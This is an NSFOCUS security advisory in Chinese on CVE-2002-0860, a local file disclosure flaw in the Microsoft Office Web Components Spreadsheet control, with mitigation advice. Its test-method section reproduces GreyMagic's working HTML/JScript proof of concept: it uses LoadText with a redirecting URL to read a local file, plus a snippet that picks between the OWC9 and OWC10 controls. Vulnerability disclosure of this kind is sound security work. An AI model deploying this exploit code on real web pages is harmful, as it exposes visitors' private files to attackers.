首页 -> 安全研究

安全研究

安全漏洞
Microsoft OWC可导致本地文件可读漏洞

发布日期:2002-04-08
更新日期:2002-04-12

受影响系统:
Microsoft Office Web Components 9
Microsoft Office Web Components 10
描述:
BUGTRAQ  ID: 4453
CVE(CAN) ID: CVE-2002-0860

Microsoft Office Web Components (OWC)是一套ActiveX对象,使用Spreadsheets、Charts、Pivot tables等提供WEB页面更丰富的HTML文档形式。OWC在OFFCIE2000和OFFICE XP下都默认安装,也可以独立的下载使用。

Microsoft Office Web Components (OWC9和OWC10)中在处理Spreadsheet组件中存在漏洞,可导致远程攻击者利用URL重定向获得用户系统本地文件内容信息。

OWC9和OWC10中的Range对象的"LoadText"模式在第一个参数中接收URL信息,如果提供的URL与当前文档不在同一域中就会返回错误。

但是这个保护可以通过提供一个重定向到本地或者远程文件的URL来绕过。OWC被欺骗认为URL是安全的并装载文件内容到spreadsheet中,攻击者可以获取这些文件内容信息并传送给服务器。

<*来源:GreyMagic Software (security@greymagic.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0094.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GreyMagic Software (security@greymagic.com)提供了如下测试方法:

下面的方法可以读取"c:/test.txt"文件内容,URL中的"getFile.asp"重定向到"file://c:/test.txt":

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
    try {
        // Load file into spreadsheet
        oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");


        // Read the spreadsheet
        var oRng=oSP.ActiveSheet.UsedRange,
            iRows=oRng.Rows.Count,
            iCols=oRng.Columns.Count,
            sRes="";


        for (var iCRow=1;iCRow<=iRows;iCRow++) {
            for (var iCCol=1;iCCol<=iCols;iCCol++) {
                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
            }
            sRes+="\n";
        }


        // Display result
        alert(sRes);
    }
    catch (oErr) {
        // Failed
        alert("File not found.");
    }
}
</script>

其中上面<object>元素的控件ID是OWC9的spreadsheet组件,OWC10的控件ID是"0002E551-0000-0000-C000-000000000046"。

攻击者可以使用下面的代码来选择OWC9或者OWC10:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 通过设置浏览器的安全配置来关闭执行Active X控件。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/Default.asp

浏览次数:3215
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客